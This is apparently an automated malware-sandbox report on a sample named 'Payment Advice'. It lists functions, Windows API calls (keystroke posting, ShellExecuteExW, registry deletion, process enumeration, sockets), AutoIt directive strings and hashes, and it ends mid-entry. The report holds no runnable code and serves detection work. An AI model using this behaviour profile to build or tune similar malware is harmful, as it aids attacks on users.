Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4d1a3f726db0e4849eab3882493ae699f48d38765e2850998897e9e9c8ed12
Instruction ID: f20b7fd8c1387f01efcb5e8d69a7cf0ba86683b2801538c0b9cea8ef85487848
Opcode Fuzzy Hash: 8a4d1a3f726db0e4849eab3882493ae699f48d38765e2850998897e9e9c8ed12
Instruction Fuzzy Hash: 637168B5900109EFDF04CF98CC89ABEBF79FF85314F248549F916AA251D734AA41CBA1

Function 005E2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005E225A
_memset.LIBCMT ref: 005E2323
ShellExecuteExW.SHELL32(?), ref: 005E2368

Part of subcall function 0058936C: __swprintf.LIBCMT ref: 005893AB
Part of subcall function 0058936C: __itow.LIBCMT ref: 005893DF

Part of subcall function 0059C6F4: _wcscpy.LIBCMT ref: 0059C717

CloseHandle.KERNEL32(00000000), ref: 005E242F
FreeLibrary.KERNEL32(00000000), ref: 005E243E

Strings

@, xrefs: 005E2334

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 36a09fce9f59d1b5e5ed4b79d8d401438b3f05bce1f4db828353d6691995a11b
Instruction ID: 20c1ade1bf8cd5175237e7f3f1069ea82c6758664a49ccd441ddbfbb7bc3e42d
Opcode Fuzzy Hash: 36a09fce9f59d1b5e5ed4b79d8d401438b3f05bce1f4db828353d6691995a11b
Instruction Fuzzy Hash: 39716C7590065A9FCF09EFA5C8859AEBBF5FF48310F108459E855AB391DB34AD40CF90

Function 005C3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 005C3C02
GetKeyboardState.USER32(?), ref: 005C3C17
SetKeyboardState.USER32(?), ref: 005C3C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 005C3CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 005C3CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 005C3D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 005C3D26

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 3d0117f3ef4c3dd82ee0b2f97a74f176cc290fb52f23c09d8fdf5045d40ed92c
Instruction ID: e648a85b349618440e99389a34b5353f894ef06130de5fe99a7b3a73aa0f650c
Opcode Fuzzy Hash: 3d0117f3ef4c3dd82ee0b2f97a74f176cc290fb52f23c09d8fdf5045d40ed92c
Instruction Fuzzy Hash: D751D3A05447D93DFB3283A48C55FBABEA97F06344F0CC58CE0D65A4C2D695EE84E760

Function 005E3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 005E3DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005E3DCB
FreeLibrary.KERNEL32(00000000), ref: 005E3E80

Part of subcall function 005E3D72: RegCloseKey.ADVAPI32(?), ref: 005E3DE8
Part of subcall function 005E3D72: FreeLibrary.KERNEL32(?), ref: 005E3E3A
Part of subcall function 005E3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 005E3E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 005E3E25

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: a2801b94ae1c4540ec8cdb5b8821c401ad64bdde5882ce8fe13829bc1f9d658e
Instruction ID: 500e73ee62a02ec1a59d02d24ebbb8b3f08e21c6042bae51d16cc55b984e7e34
Opcode Fuzzy Hash: a2801b94ae1c4540ec8cdb5b8821c401ad64bdde5882ce8fe13829bc1f9d658e
Instruction Fuzzy Hash: D231ECB1901149BFDB199FD5DC89AFFBBBDFB08340F000169E552A3150D6749F859BA0

Function 005E8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005E8FE7
GetWindowLongW.USER32(01781AC0,000000F0), ref: 005E901A
GetWindowLongW.USER32(01781AC0,000000F0), ref: 005E904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 005E9081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005E90AB
GetWindowLongW.USER32(00000000,000000F0), ref: 005E90BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005E90D6

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 02959a5b18e6a5dd41f15bc0cd8cc074e57487ed99f3dd85326c02b018b02a1e
Instruction ID: 512958a1fd0979321acc59a7bc53d13f01d0ef329116517f90df3479ef786eb4
Opcode Fuzzy Hash: 02959a5b18e6a5dd41f15bc0cd8cc074e57487ed99f3dd85326c02b018b02a1e
Instruction Fuzzy Hash: 9D315778650295EFDB24CF5ADC88F653BA6FB4A314F151264F5598F2B2CB72A840CB40

Function 005C08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005C08F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005C0918
SysAllocString.OLEAUT32(00000000), ref: 005C091B
SysAllocString.OLEAUT32(?), ref: 005C0939
SysFreeString.OLEAUT32(?), ref: 005C0942
StringFromGUID2.OLE32(?,?,00000028), ref: 005C0967
SysAllocString.OLEAUT32(?), ref: 005C0975

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d5a2b8ac731a7755048e583d34af2ec823e0b024d033bee397610b60994a03cc
Instruction ID: 4e342c2837ccb010853a46e62ccb26acb39161c86d28c540e2b05774fe2365f4
Opcode Fuzzy Hash: d5a2b8ac731a7755048e583d34af2ec823e0b024d033bee397610b60994a03cc
Instruction Fuzzy Hash: 4E217176601219AFEF109BE8CC88EBB77ECFB09360B409625F915DB191D670EC458B60

Function 005C2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 005C2485
__wcsnicmp.LIBCMT ref: 005C24A6
__wcsnicmp.LIBCMT ref: 005C24C0

Strings

#OnAutoItStartRegister, xrefs: 005C24BA
#requireadmin, xrefs: 005C24A0
#notrayicon, xrefs: 005C247D

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: ac0029b3c7d6e23eedcf3be84cebed6b741aff24069dbfe73f7f1e990b753418
Instruction ID: c299a0b715452f91faad6f562f2647d4086b1d3f83a59057af21248084c6d30a
Opcode Fuzzy Hash: ac0029b3c7d6e23eedcf3be84cebed6b741aff24069dbfe73f7f1e990b753418
Instruction Fuzzy Hash: 2D217C321005126BCB24B6B49C16FBB7F9CFFA5310F10442DF445DB081E6659942C3E4

Function 005C0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005C09CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005C09F1
SysAllocString.OLEAUT32(00000000), ref: 005C09F4
SysAllocString.OLEAUT32 ref: 005C0A15
SysFreeString.OLEAUT32 ref: 005C0A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 005C0A38
SysAllocString.OLEAUT32(?), ref: 005C0A46

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7edf324b9ab5a4f760aec5b48567bc052406d05a35d5ff0c625284738d52a5f1
Instruction ID: f0450db93464ea3d37894b64c37296107be16690e82838be23278d1ebd752aea
Opcode Fuzzy Hash: 7edf324b9ab5a4f760aec5b48567bc052406d05a35d5ff0c625284738d52a5f1
Instruction Fuzzy Hash: C4214475600214AFDB109FE8DC89EAB7BEDFF483607409129F909CB2A1D670EC418764

Function 0059CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0059CCF6
GetWindowRect.USER32(?,?), ref: 0059CD37
ScreenToClient.USER32(?,?), ref: 0059CD5F
GetClientRect.USER32(?,?), ref: 0059CE8C
GetWindowRect.USER32(?,?), ref: 0059CEA5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 83bef90b07eff6b1f2428cc64565555ae2a945759e63ab51e7540d133fa12221
Instruction ID: 5c74359787edd236075e8bf7bbbed14be14b81b807e5d3918cb51eaadd0b984d
Opcode Fuzzy Hash: 83bef90b07eff6b1f2428cc64565555ae2a945759e63ab51e7540d133fa12221
Instruction Fuzzy Hash: 03B1497990024ADBDF10CFA8C5847EEBFB5FF08340F149529ED5AAB254DB34AA50CB64

Function 005E1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 005E1C18
Process32FirstW.KERNEL32(00000000,?), ref: 005E1C26
__wsplitpath.LIBCMT ref: 005E1C54

Part of subcall function 005A1DFC: __wsplitpath_helper.LIBCMT ref: 005A1E3C

_wcscat.LIBCMT ref: 005E1C69
Process32NextW.KERNEL32(00000000,?), ref: 005E1CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 005E1CF1

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 560d92ad59798e8eb3c1f3768bf3b85c84321666a943cba44edc35ecc8a67f2f
Instruction ID: 2731e519a70d1de07e3c6c9dac705117872803b8cfdb3f13d76fdcea258e728a
Opcode Fuzzy Hash: 560d92ad59798e8eb3c1f3768bf3b85c84321666a943cba44edc35ecc8a67f2f
Instruction Fuzzy Hash: 1B515E71104741AFD724EF64C885EABBBE8FF88754F00491EF98697251EB70D904CBA6

Function 005E2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005E2BB5,?,?), ref: 005E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E30AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005E30EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 005E3112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 005E313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 005E317E
RegCloseKey.ADVAPI32(00000000), ref: 005E318B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: c24373458c5bec09f56d114c720c18ede3144656fec3676ca7287e8760f50357
Instruction ID: 61d337165a48c191a901fdce0251bd7e519966a14fa2db6bfb1bf05ff017656d
Opcode Fuzzy Hash: c24373458c5bec09f56d114c720c18ede3144656fec3676ca7287e8760f50357
Instruction Fuzzy Hash: 6E513731104341AFC708EF64C899E6ABBE9FF88304F04495DF996972A1DB31EA05CB52

Function 005E84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 005E8540
GetMenuItemCount.USER32(00000000), ref: 005E8577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005E859F
GetMenuItemID.USER32(?,?), ref: 005E860E
GetSubMenu.USER32(?,?), ref: 005E861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 005E866D

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 990aed00ca0c8739b98c79805093e47974a4b3d158794562c080440b321f1915
Instruction ID: a13c002d2f092940b879c79495649af5a1756c98d308d462f295d94eb4ed773a
Opcode Fuzzy Hash: 990aed00ca0c8739b98c79805093e47974a4b3d158794562c080440b321f1915
Instruction Fuzzy Hash: 7B519C31A00615AFCF05EF95C845ABEBBF5FF48310F104459E95ABB351CB30AE418B90

Function 005C4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005C4B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C4B5B
IsMenu.USER32(00000000), ref: 005C4B7B
CreatePopupMenu.USER32 ref: 005C4BAF
GetMenuItemCount.USER32(000000FF), ref: 005C4C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 005C4C3E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: ce4c03e52eeea1a20a762ed8052cc40dac1eb385d7915f8fa466ed54d1d29018
Instruction ID: a6dd921e83842e5102725da85bd3ac8a8338b042c9c6570e7b9ea99a6547efd3
Opcode Fuzzy Hash: ce4c03e52eeea1a20a762ed8052cc40dac1eb385d7915f8fa466ed54d1d29018
Instruction Fuzzy Hash: BB51677060124AAFDF20CFA8C898FAEBFA5BF45318F14815DE8159A2A1E3719D44CF51

Function 005D8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0061DC00), ref: 005D8E7C
WSAGetLastError.WSOCK32(00000000), ref: 005D8E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 005D8EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 005D8EC5
_strlen.LIBCMT ref: 005D8EF7
WSAGetLastError.WSOCK32(00000000), ref: 005D8F6A

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: ff4ce308200d62ba2b80bf8acf82ae9c24c70d0b61abce4c7cebca37fb963c9b
Instruction ID: 28a501ff894381278e21357c48506807213dba095efb26621aba51cc8b02f271
Opcode Fuzzy Hash: ff4ce308200d62ba2b80bf8acf82ae9c24c70d0b61abce4c7cebca37fb963c9b
Instruction Fuzzy Hash: 26417575500105AFCB14EBA8CD99EAEBBB9FF44314F10465AF516A72D1DF309E44CB60

Function 0059ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0059B34E: GetWindowLongW.USER32(?,000000EB), ref: 0059B35F

BeginPaint.USER32(?,?,?), ref: 0059AC2A
GetWindowRect.USER32(?,?), ref: 0059AC8E
ScreenToClient.USER32(?,?), ref: 0059ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0059ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0059AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 005FE673

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 91091b09d365140b55f6cbe0b01acbd8e9a7df135ab850fe59dbaadfd8028ed7
Instruction ID: be258fb067d94441513ce92eb816a7b5198ddad27a3cee7258a5b0541207cc53
Opcode Fuzzy Hash: 91091b09d365140b55f6cbe0b01acbd8e9a7df135ab850fe59dbaadfd8028ed7
Instruction Fuzzy Hash: A44190741043059FDB10DF14DC89F777FA9BB56320F140669FAA58A2A1C7319D84DBA2

Function 005EE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00641628,00000000,00641628,00000000,00000000,00641628,?,005FDC5D,00000000,?,00000000,00000000,00000000,?,005FDAD1,00000004), ref: 005EE40B
EnableWindow.USER32(00000000,00000000), ref: 005EE42F
ShowWindow.USER32(00641628,00000000), ref: 005EE48F
ShowWindow.USER32(00000000,00000004), ref: 005EE4A1
EnableWindow.USER32(00000000,00000001), ref: 005EE4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 005EE4E8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: ddae8eb54c1dce78896a0abd06fc36fa577b7fe565fde7da21ef10e8b2144c50
Instruction ID: 172500d508dea4f512fb2ba0029720c2325bd42258f608c201732360cfb91ab3
Opcode Fuzzy Hash: ddae8eb54c1dce78896a0abd06fc36fa577b7fe565fde7da21ef10e8b2144c50
Instruction Fuzzy Hash: FC416130611581EFDF2ACF65C49AB957FE1BF09304F1841A9EA989F2E2C731AC41CB51

Function 005C98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 005C98D1

Part of subcall function 0059F4EA: std::exception::exception.LIBCMT ref: 0059F51E
Part of subcall function 0059F4EA: __CxxThrowException@8.LIBCMT ref: 0059F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 005C9908
EnterCriticalSection.KERNEL32(?), ref: 005C9924
LeaveCriticalSection.KERNEL32(?), ref: 005C999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005C99B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 005C99D2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 8d06c3219d65cd579acc9aed40df35e7297adb24b420b27ed2780a95c62a242d
Instruction ID: e42c83dbca594f8db8f91d0efd40e412ceb210f9819d48357c8998fca510e540
